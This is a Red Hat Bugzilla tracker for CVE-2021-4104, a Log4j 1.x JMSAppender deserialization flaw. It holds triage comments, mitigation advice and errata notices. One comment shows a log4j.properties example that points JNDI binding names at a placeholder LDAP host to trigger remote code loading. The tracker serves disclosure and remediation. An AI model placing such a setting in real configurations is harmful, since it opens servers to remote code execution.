2031667 – (CVE-2021-4104) CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender

Bug 2031667 (CVE-2021-4104) - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender

Summary: CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is c...

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2021-4104
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	medium
Severity:	medium
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	2031674 2031675 2031676 2031677 2031679 2032100 2032101 2032102 2032151 2032152 2032153 2032154 2032155 2032156 2032157 2032158 2032159 2032160 2032161 2032162 2032163 2032164 2032166 2032182 2032185 2032309 2032310 2032311 2032312 2032313 2032314 2032315 2032316 2032317 2032318 2032319 2032320 2032321 2032322 2032323 2033534
Blocks:	2030930
TreeView+	depends on / blocked

Reported:	2021-12-13 07:54 UTC by Paramvir jindal
Modified:	2023-09-15 01:50 UTC (History)
CC List:	159 users (show)
Fixed In Version:	log4j 2.15.0
Doc Type:	If docs needed, set a value
Doc Text:	A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker's JNDI LDAP endpoint.
Clone Of:
Environment:
Last Closed:	2021-12-22 22:10:56 UTC
Embargoed:
Flags:	gmalinko: needinfo- aileenc: needinfo-

Attachments	(Terms of Use)

Links
System	ID	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2021:5107	None	None	None	2021-12-16 15:00:35 UTC
Red Hat Product Errata	RHSA-2021:5141	None	None	None	2021-12-16 07:50:15 UTC
Red Hat Product Errata	RHSA-2021:5148	None	None	None	2021-12-15 20:09:49 UTC
Red Hat Product Errata	RHSA-2021:5183	None	None	None	2021-12-16 21:16:14 UTC
Red Hat Product Errata	RHSA-2021:5184	None	None	None	2021-12-16 21:40:44 UTC
Red Hat Product Errata	RHSA-2021:5186	None	None	None	2021-12-16 22:36:35 UTC
Red Hat Product Errata	RHSA-2021:5206	None	None	None	2021-12-20 09:32:00 UTC
Red Hat Product Errata	RHSA-2021:5269	None	None	None	2021-12-22 21:26:13 UTC
Red Hat Product Errata	RHSA-2022:0289	None	None	None	2022-01-26 14:51:59 UTC
Red Hat Product Errata	RHSA-2022:0290	None	None	None	2022-01-26 14:49:38 UTC
Red Hat Product Errata	RHSA-2022:0291	None	None	None	2022-01-26 14:50:54 UTC
Red Hat Product Errata	RHSA-2022:0294	None	None	None	2022-01-26 14:45:56 UTC
Red Hat Product Errata	RHSA-2022:0430	None	None	None	2022-02-03 14:04:50 UTC
Red Hat Product Errata	RHSA-2022:0435	None	None	None	2022-02-03 18:24:10 UTC
Red Hat Product Errata	RHSA-2022:0436	None	None	None	2022-02-03 18:30:31 UTC
Red Hat Product Errata	RHSA-2022:0437	None	None	None	2022-02-03 18:44:40 UTC
Red Hat Product Errata	RHSA-2022:0438	None	None	None	2022-02-03 18:49:53 UTC
Red Hat Product Errata	RHSA-2022:0444	None	None	None	2022-02-07 13:42:03 UTC
Red Hat Product Errata	RHSA-2022:0445	None	None	None	2022-02-07 14:23:44 UTC
Red Hat Product Errata	RHSA-2022:0446	None	None	None	2022-02-07 13:44:04 UTC
Red Hat Product Errata	RHSA-2022:0447	None	None	None	2022-02-07 13:53:49 UTC
Red Hat Product Errata	RHSA-2022:0448	None	None	None	2022-02-07 13:52:46 UTC
Red Hat Product Errata	RHSA-2022:0449	None	None	None	2022-02-07 13:48:38 UTC
Red Hat Product Errata	RHSA-2022:0450	None	None	None	2022-02-07 14:47:57 UTC
Red Hat Product Errata	RHSA-2022:0475	None	None	None	2022-02-08 16:57:20 UTC
Red Hat Product Errata	RHSA-2022:0497	None	None	None	2022-02-09 13:11:23 UTC
Red Hat Product Errata	RHSA-2022:0507	None	None	None	2022-02-10 17:26:51 UTC
Red Hat Product Errata	RHSA-2022:0524	None	None	None	2022-02-14 17:07:12 UTC
Red Hat Product Errata	RHSA-2022:0527	None	None	None	2022-02-14 17:31:16 UTC
Red Hat Product Errata	RHSA-2022:0553	None	None	None	2022-02-15 18:54:58 UTC
Red Hat Product Errata	RHSA-2022:0661	None	None	None	2022-02-23 20:00:57 UTC
Red Hat Product Errata	RHSA-2022:1296	None	None	None	2022-04-11 12:56:47 UTC
Red Hat Product Errata	RHSA-2022:1297	None	None	None	2022-04-11 12:58:16 UTC
Red Hat Product Errata	RHSA-2022:1299	None	None	None	2022-04-11 13:01:04 UTC
Red Hat Product Errata	RHSA-2022:5458	None	None	None	2022-06-30 18:34:48 UTC
Red Hat Product Errata	RHSA-2022:5459	None	None	None	2022-06-30 18:56:22 UTC
Red Hat Product Errata	RHSA-2022:5460	None	None	None	2022-06-30 19:11:25 UTC

Description Paramvir jindal 2021-12-13 07:54:06 UTC

A flaw was found in the Java logging library Apache Log4j in version 1.x . This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender.

In 1.x you will find that there are two places where lookups are done - that is JMSAppender.java:207 and JMSAppender.java:222 - if you set TopicBindingName or TopicConnectionFactoryBindingName to something that JNDI can handle - for example "ldap://host:port/a" JNDI will do exactly the same thing it does for 2.x - so 1.x is vulnerable, just attack vector is "safer" as it depends on configuration rather than user input

This flaw in Log4j 2.x is tracked via CVE-2021-44228

Comment 3 Huzaifa S. Sidhpurwala 2021-12-13 08:25:44 UTC

Created log4j tracking bugs for this issue:

Affects: fedora-all [bug 2031679]

Comment 5 Torstein Hansen 2021-12-13 09:24:22 UTC

https://github.com/apache/logging-log4j2/pull/608
Note that log4j 1.x is End of Life and has other security vulnerabilities that will not be fixed
https://logging.apache.org/log4j/1.2/
https://www.cvedetails.com/cve/CVE-2019-17571/

Comment 9 Yadnyawalk Tale 2021-12-13 12:49:18 UTC

Red Hat Satellite bundles log4j-over-slf4j with Candlepin, however, product is not affected as it does not make use of JMSAppender method and use logback framework for logging.

Comment 14 Simone 2021-12-13 17:09:23 UTC

Hi there,

I don't understand how this vulnerability can be considered like the original one in 2.x.

1) you need to gain access to the log4j.properties file
2) you can execute a command only by putting it in the properties TopicBindingName or TopicConnectionFactoryBindingName. For example:
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.jms.ProviderURL=tcp://localhost:61616
>>>log4j.appender.jms.TopicBindingName=ldap://host:port/a
>>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a

So it's not input-driven like the CVE-2021-44228. In a situation like this, I don't understand how an attacker can (as written in the title) do a "Remote code execution". In the worst scenario it can be a "local code execution" after he already gained server access...am I wrong? Thank you!

Comment 23 Paramvir jindal 2021-12-14 05:20:24 UTC

In reply to comment #14:
> Hi there,
> 
> I don't understand how this vulnerability can be considered like the
> original one in 2.x.
> 
> 1) you need to gain access to the log4j.properties file
> 2) you can execute a command only by putting it in the properties
> TopicBindingName or TopicConnectionFactoryBindingName. For example:
> log4j.appender.jms=org.apache.log4j.net.JMSAppender
> log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.
> ActiveMQInitialContextFactory
> log4j.appender.jms.ProviderURL=tcp://localhost:61616
> >>>log4j.appender.jms.TopicBindingName=ldap://host:port/a
> >>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a
> 
> So it's not input-driven like the CVE-2021-44228. In a situation like this,
> I don't understand how an attacker can (as written in the title) do a
> "Remote code execution". In the worst scenario it can be a "local code
> execution" after he already gained server access...am I wrong? Thank you!

that is correct. I have updated the CVE description just now to include as much details as possible regarding the conditions required to exploit the flaw.

Comment 24 Paramvir jindal 2021-12-14 06:48:44 UTC

Marking Red Hat EAP-XP 3 as not affected; the product does not directly ship log4j, but consumes artifacts from base EAP.

Comment 25 Paramvir jindal 2021-12-14 07:06:14 UTC

Marking JDG-8 as not affected as it does not ship log4j version 1 anywhere with its distribution.

Comment 32 Simone 2021-12-14 08:21:00 UTC

(In reply to Paramvir jindal from comment #23)
> In reply to comment #14:
> > Hi there,
> > 
> > I don't understand how this vulnerability can be considered like the
> > original one in 2.x.
> > 
> > 1) you need to gain access to the log4j.properties file
> > 2) you can execute a command only by putting it in the properties
> > TopicBindingName or TopicConnectionFactoryBindingName. For example:
> > log4j.appender.jms=org.apache.log4j.net.JMSAppender
> > log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.
> > ActiveMQInitialContextFactory
> > log4j.appender.jms.ProviderURL=tcp://localhost:61616
> > >>>log4j.appender.jms.TopicBindingName=ldap://host:port/a
> > >>>log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://host:port/a
> > 
> > So it's not input-driven like the CVE-2021-44228. In a situation like this,
> > I don't understand how an attacker can (as written in the title) do a
> > "Remote code execution". In the worst scenario it can be a "local code
> > execution" after he already gained server access...am I wrong? Thank you!
> 
> that is correct. I have updated the CVE description just now to include as
> much details as possible regarding the conditions required to exploit the
> flaw.

Thank you Paramvir! In this case, the only real solution would be to give proper read/write permission to our application files, right? If I simply update my log4j to the latest fixed version (2.15), I would still be vulnerable, since an attacker that has gained access to my server can also replace my log4j jar with a previous version. what do you think? Thanks again!

Comment 41 Ugo Bellavance 2021-12-14 11:16:57 UTC

Please add status for Red Hat Enterprise Linux 6, which is still covered by ELS.
Thanks,

Comment 43 Mark Little 2021-12-14 11:58:01 UTC

I agree with Carlo de Wolf and others: there is no log4j v2 exploit here. Other vendors, such as Apache, Snyk, Microsoft, Atlassian etc. have reviewed log4j v1 too, specifically with the JMSAppender concern. Including a couple of references:

https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html

"We have done additional analysis on this fork and confirmed a new but similar vulnerability that can only be exploited by a trusted party. For that reason, Atlassian rates the severity level for on-premises products as low. Specifically, Atlassian products that use Log4j 1.x are only affected if all of the following non-default configurations are in place:

The JMS Appender is configured in the application's Log4j configuration
The javax.jms API is included in the application's CLASSPATH
The JMS Appender has been configured with a JNDI lookup to a third party. Note: this can only be done by a trusted user modifying the application's configuration, or by trusted code setting a property at runtime "

And https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv

"1. As *log4j 1.x* does NOT offer a JNDI look up mechanism at the message level,* it does NOT suffer from CVE-2021-44228.*
2. However, log4j 1.x comes with JMSAppender which will perform JNDI lookup if enabled in log4j's configuration file, i.e. *log4j.properties* or *log4j.xml*.
3. In the absense of a new log4j 1.x release, you can remove JMSAppender from *log4j-1.2.17.jar* artifact yourself. (commands are listed in the page <http://slf4j.org/log4shell.html>)
4. Therefore, in addition to hardening KNOWN vulnerable components in aforementioned frameworks, we also recommend that *configuration files be protected against write access*. In Unix-speak they should be *read-only for all users, including the owner*. If possible, they should also be monitored against changes and unauthorized manipulation."

Comment 50 Mike Murphy 2021-12-15 17:17:48 UTC

Can we confirm whether or not we'll provide an update for verion 1.x ? Specifically  1.2.17? Or will this be considered not affected?

Comment 51 errata-xmlrpc 2021-12-15 20:09:42 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.8

Via RHSA-2021:5148 https://access.redhat.com/errata/RHSA-2021:5148

Comment 55 errata-xmlrpc 2021-12-16 07:50:10 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.6

Via RHSA-2021:5141 https://access.redhat.com/errata/RHSA-2021:5141

Comment 57 errata-xmlrpc 2021-12-16 15:00:29 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.7

Via RHSA-2021:5107 https://access.redhat.com/errata/RHSA-2021:5107

Comment 58 Ted Jongseok Won 2021-12-16 16:10:47 UTC

In reply to comment #50:
> Can we confirm whether or not we'll provide an update for verion 1.x ?
> Specifically  1.2.17? Or will this be considered not affected?

Providing or using a patched log4j 1.x version is at the discretion of the particular affected product's team.

Note: 
This is a moderate impact CVE and may be out of support scope for some products listed, these are detailed on our life-cycle pages - https://access.redhat.com/support/policy/updates/jboss_notes/

Comment 65 errata-xmlrpc 2021-12-16 21:16:09 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.8

Via RHSA-2021:5183 https://access.redhat.com/errata/RHSA-2021:5183

Comment 66 errata-xmlrpc 2021-12-16 21:40:36 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.7

Via RHSA-2021:5184 https://access.redhat.com/errata/RHSA-2021:5184

Comment 67 errata-xmlrpc 2021-12-16 22:36:27 UTC

This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.6

Via RHSA-2021:5186 https://access.redhat.com/errata/RHSA-2021:5186

Comment 69 errata-xmlrpc 2021-12-20 09:31:54 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6 Extended Lifecycle Support
  Red Hat Enterprise Linux 7.3 Advanced Update Support
  Red Hat Enterprise Linux 7.4 Advanced Update Support
  Red Hat Enterprise Linux 7.6 Advanced Update Support
  Red Hat Enterprise Linux 7.6 Update Services for SAP Solutions
  Red Hat Enterprise Linux 7.6 Telco Extended Update Support
  Red Hat Enterprise Linux 7.7 Advanced Update Support
  Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions
  Red Hat Enterprise Linux 7.7 Telco Extended Update Support
  Red Hat Enterprise Linux 7

Via RHSA-2021:5206 https://access.redhat.com/errata/RHSA-2021:5206

Comment 72 errata-xmlrpc 2021-12-22 21:26:05 UTC

This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7

Via RHSA-2021:5269 https://access.redhat.com/errata/RHSA-2021:5269

Comment 73 Product Security DevOps Team 2021-12-22 22:10:48 UTC

This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-4104

Comment 83 errata-xmlrpc 2022-01-26 14:45:48 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions

Via RHSA-2022:0294 https://access.redhat.com/errata/RHSA-2022:0294

Comment 84 errata-xmlrpc 2022-01-26 14:49:31 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:0290 https://access.redhat.com/errata/RHSA-2022:0290

Comment 85 errata-xmlrpc 2022-01-26 14:50:46 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.2 Extended Update Support

Via RHSA-2022:0291 https://access.redhat.com/errata/RHSA-2022:0291

Comment 86 errata-xmlrpc 2022-01-26 14:51:51 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.4 Extended Update Support

Via RHSA-2022:0289 https://access.redhat.com/errata/RHSA-2022:0289

Comment 87 errata-xmlrpc 2022-02-03 14:04:43 UTC

This issue has been addressed in the following products:

  Red Hat Data Grid 7.3.9

Via RHSA-2022:0430 https://access.redhat.com/errata/RHSA-2022:0430

Comment 88 errata-xmlrpc 2022-02-03 18:24:04 UTC

This issue has been addressed in the following products:

  EAP 7.4 log4j async

Via RHSA-2022:0435 https://access.redhat.com/errata/RHSA-2022:0435

Comment 89 errata-xmlrpc 2022-02-03 18:30:25 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.4 on RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8

Via RHSA-2022:0436 https://access.redhat.com/errata/RHSA-2022:0436

Comment 90 errata-xmlrpc 2022-02-03 18:44:32 UTC

This issue has been addressed in the following products:

  EAP 6.4 log4j async

Via RHSA-2022:0437 https://access.redhat.com/errata/RHSA-2022:0437

Comment 91 errata-xmlrpc 2022-02-03 18:49:46 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6
  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2022:0438 https://access.redhat.com/errata/RHSA-2022:0438

Comment 92 errata-xmlrpc 2022-02-07 13:41:55 UTC

This issue has been addressed in the following products:

  RHEL-8 based Middleware Containers

Via RHSA-2022:0444 https://access.redhat.com/errata/RHSA-2022:0444

Comment 93 errata-xmlrpc 2022-02-07 13:43:55 UTC

This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.4.10

Via RHSA-2022:0446 https://access.redhat.com/errata/RHSA-2022:0446

Comment 94 errata-xmlrpc 2022-02-07 13:48:30 UTC

This issue has been addressed in the following products:

  RHSSO 7.5.1

Via RHSA-2022:0449 https://access.redhat.com/errata/RHSA-2022:0449

Comment 96 errata-xmlrpc 2022-02-07 13:52:36 UTC

This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.5 for RHEL 8

Via RHSA-2022:0448 https://access.redhat.com/errata/RHSA-2022:0448

Comment 97 errata-xmlrpc 2022-02-07 13:53:40 UTC

This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.5 for RHEL 7

Via RHSA-2022:0447 https://access.redhat.com/errata/RHSA-2022:0447

Comment 98 errata-xmlrpc 2022-02-07 14:23:36 UTC

This issue has been addressed in the following products:

  RHEL-8 based Middleware Containers

Via RHSA-2022:0445 https://access.redhat.com/errata/RHSA-2022:0445

Comment 99 errata-xmlrpc 2022-02-07 14:47:49 UTC

This issue has been addressed in the following products:

  RHEL-8 based Middleware Containers

Via RHSA-2022:0450 https://access.redhat.com/errata/RHSA-2022:0450

Comment 100 errata-xmlrpc 2022-02-08 16:57:12 UTC

This issue has been addressed in the following products:

  Red Hat Virtualization Engine 4.4

Via RHSA-2022:0475 https://access.redhat.com/errata/RHSA-2022:0475

Comment 101 errata-xmlrpc 2022-02-09 13:11:15 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Data Virtualization 6.4.8.SP1

Via RHSA-2022:0497 https://access.redhat.com/errata/RHSA-2022:0497

Comment 102 errata-xmlrpc 2022-02-10 17:26:45 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Data Virtualization 6.4.8.SP2

Via RHSA-2022:0507 https://access.redhat.com/errata/RHSA-2022:0507

Comment 103 errata-xmlrpc 2022-02-14 17:07:04 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Web Server 3 for RHEL 7

Via RHSA-2022:0524 https://access.redhat.com/errata/RHSA-2022:0524

Comment 104 errata-xmlrpc 2022-02-14 17:31:10 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Web Server

Via RHSA-2022:0527 https://access.redhat.com/errata/RHSA-2022:0527

Comment 105 errata-xmlrpc 2022-02-15 18:54:50 UTC

This issue has been addressed in the following products:

  Red Hat Fuse/AMQ 6.3.20

Via RHSA-2022:0553 https://access.redhat.com/errata/RHSA-2022:0553

Comment 106 errata-xmlrpc 2022-02-23 20:00:48 UTC

This issue has been addressed in the following products:

  Red Hat Fuse 7.10.1

Via RHSA-2022:0661 https://access.redhat.com/errata/RHSA-2022:0661

Comment 107 errata-xmlrpc 2022-04-11 12:56:39 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.4 on RHEL 7

Via RHSA-2022:1296 https://access.redhat.com/errata/RHSA-2022:1296

Comment 108 errata-xmlrpc 2022-04-11 12:58:10 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8

Via RHSA-2022:1297 https://access.redhat.com/errata/RHSA-2022:1297

Comment 109 errata-xmlrpc 2022-04-11 13:00:55 UTC

This issue has been addressed in the following products:

  EAP 7.4.4 release

Via RHSA-2022:1299 https://access.redhat.com/errata/RHSA-2022:1299

Comment 113 errata-xmlrpc 2022-06-30 18:34:39 UTC

This issue has been addressed in the following products:

  EAP 6.4.24 release

Via RHSA-2022:5458 https://access.redhat.com/errata/RHSA-2022:5458

Comment 114 errata-xmlrpc 2022-06-30 18:56:13 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2022:5459 https://access.redhat.com/errata/RHSA-2022:5459

Comment 115 errata-xmlrpc 2022-06-30 19:11:15 UTC

This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2022:5460 https://access.redhat.com/errata/RHSA-2022:5460

Comment 116 Red Hat Bugzilla 2023-09-15 01:50:31 UTC

The needinfo request[s] on this closed bug have been removed as they have been unresolved for 365 days

Note You need to log in before you can comment on or make changes to this bug.

aboyko
aileenc
akoufoud
alazarot
almorale
anstephe
aos-bugs
asoldano
atangrin
ataylor
avibelli
bbaranow
bbuckingham
bcourt
bdettelb
bgeorges
bibryam
bihu
bkearney
bmaxwell
bmontgom
boliveir
brian.stansberry
btotty
caswilli
cdewolf
chazlett
clement.escoffier
cpanceac
cruhm
csutherl
dandread
darran.lofthouse
dbecker
dbhole
dchong
devrim
dkreling
dosoudil
drieden
ehelms
eleandro
eparis
etirelli
fbrychta
fjuma
fweimer
ggaughan
ggrzybek
gmalinko
gsmet
gvarsami
gzaronik
hamadhan
hbraun
hhorak
ibek
iweiss
janstey
java-sig-commits
jburrell
jclere
jcoleman
jjoyce
jnethert
jochrist
jokerman
jolee
jortizpa
jorton
jpallich
jperkins
jrokos
jross
jschatte
jschluet
jsherril
jstastny
jwong
jwon
kahara
kaycoth
klaas
krathod
ksathe
kverlaen
kwills
kyoshida
ldimaggi
leiyu
lgao
lhh
loleary
lpeer
lsurette
lthon
lzap
mburns
mhulan
michal.skrivanek
micmurph
mizdebsk
mkolesni
mlittle
mmccune
mnovotny
mperina
msochure
msvehla
mszynkie
myarboro
nmoumoul
nobody
nstielau
nwallace
orabin
pantinor
pcreech
pdelbell
pdrozd
peholase
pgallagh
pjindal
pmackay
probinso
rchan
rguimara
rrajasek
rruss
rstancel
rsvoboda
rwagner
sbiarozk
sbonazzo
sclewis
scohen
sd-operator-metering
sdouglas
security-response-team
slinaber
smaestri
spinder
sponnaga
sthorger
swoodman
szappis
tcunning
tflannag
theute
tkirby
tmielke
tom.jenkinson
tuxmealux+redhatbz
tzimanyi
ubellavance
vkumar
yborgess
ymittal
ytale